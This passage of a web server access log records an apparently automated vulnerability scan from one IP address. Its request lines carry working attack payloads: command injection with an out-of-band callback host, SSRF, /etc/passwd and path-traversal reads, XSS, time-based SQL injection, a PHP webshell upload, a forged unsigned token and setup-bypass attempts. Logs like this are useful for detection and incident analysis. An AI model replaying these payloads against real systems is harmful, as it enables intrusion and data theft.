(lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:09:03:29 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:09:03:31 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:09:06:17 -0400] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:06:24 -0400] "GET /wp-admin/users.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:06:42 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:07:06 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:07:12 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:07:14 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:07:21 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:09:07:52 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:08:10 -0400] 
"GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:09:08:18 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:08:44 -0400] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2w9rfXLxu0JUmyMsVrVtTu7y9ae.pHp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:08:51 -0400] "GET /wp-content/uploads/cfom_files/2w9rfxlxu0jumymsvrvttu7y9ae.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:09:12 -0400] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0" 154.84.62.234 - - [24/Apr/2025:09:09:14 -0400] "POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d04qr7ij4pq19d75k4903drhjy5qxpjeb.oast.online) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:09:09:47 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:09:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:10:05 -0400] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:10:10 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:09:10:58 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:11:19 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:12:35 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:12:36 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:12:38 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:13:09 -0400] "GET /?paytm_action=curltest&url=d04qr7ij4pq19d75k490os376tipkpeiw.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:13:23 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:13:31 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:13:31 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:13:40 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:13:43 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:14:39 -0400] "GET /?phonepe_action=curltestPhonePe&url=http://d04qr7ij4pq19d75k49078t14n9d1tcej.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:16:49 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:16:57 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:16:57 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:17:07 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 154.84.62.234 - - [24/Apr/2025:09:17:13 -0400] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:09:17:13 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:17:18 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; 
Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:17:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" 154.84.62.234 - - [24/Apr/2025:09:17:39 -0400] "POST /SamlResponseServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:18:35 -0400] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - - [24/Apr/2025:09:19:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:19:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:19:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET 
/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:45 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/618.25.8 (KHTML, like Gecko) Version/17.3 Safari/618.25.8" 154.84.62.234 - - [24/Apr/2025:09:20:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:22:58 -0400] "POST /search-request.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:23:36 -0400] "POST /banker/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:09:23:39 -0400] "POST /search-locker-details.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:09:23:42 -0400] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:24:04 -0400] "POST /goanywhere/lic/accept HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:24:05 -0400] "GET /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:24:13 -0400] "POST /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:09:26:16 -0400] "GET /accounts/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:26:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:27:25 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:27:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:27:38 -0400] "GET /?s=<%2Fscript><script>alert%28document.domain%29<%2Fscript> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:09:27:56 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:28:11 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:28:12 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:28:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:09:28:36 -0400] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:28:42 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - 
[24/Apr/2025:09:28:46 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:09:29:08 -0400] "POST /index.php?c=blocked&action=continue HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:29:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:29:29 -0400] "POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:30:11 -0400] "GET /queues HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:30:34 -0400] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:31:50 -0400] "GET /index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:32:01 -0400] "GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:32:46 -0400] "POST /saas./resttosaasservlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" 154.84.62.234 - - [24/Apr/2025:09:33:11 -0400] "GET /csrf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:128.0) Gecko/20100101 
Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:33:45 -0400] "GET /api/v2/parameters/core/ HTTP/1.1" 200 0 "-" "7h3h4ckv157" 154.84.62.234 - - [24/Apr/2025:09:34:02 -0400] "POST /kubepi/api/v1/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:34:09 -0400] "POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:34:29 -0400] "POST /json/setup-restore.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:09:34:50 -0400] "POST /template/aui/text-inline.vm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:35:32 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:09:35:37 -0400] "POST /spcgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:36:11 -0400] "GET /api/auth/cognito/callback?access_token=oenbmsnn&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoieHdxdXdoem9kciIsImVtYWlsIjoie3tlbWFpbH19In0=. 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/25.0.1 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:37:03 -0400] "POST /spcgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:37:13 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 139.99.50.198 - - [24/Apr/2025:09:37:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:37:20 -0400] "GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 139.99.50.198 - - [24/Apr/2025:09:37:20 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 139.99.50.198 - - [24/Apr/2025:09:37:23 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:37:28 -0400] "GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:38:28 -0400] "GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:38:30 -0400] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; 
Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:38:32 -0400] "GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:09:38:33 -0400] "GET /setup/setupadministrator-start.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:09:38:33 -0400] "GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:38:35 -0400] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:09:38:36 -0400] "POST /ajax/api/user/save HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:38:39 -0400] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2w9rfR03cz93oiHqoP6y19rIlO3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" 154.84.62.234 - - [24/Apr/2025:09:38:44 -0400] "GET /setup/setupadministrator-start.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:09:38:49 -0400] "POST /setup/setupadministrator.action 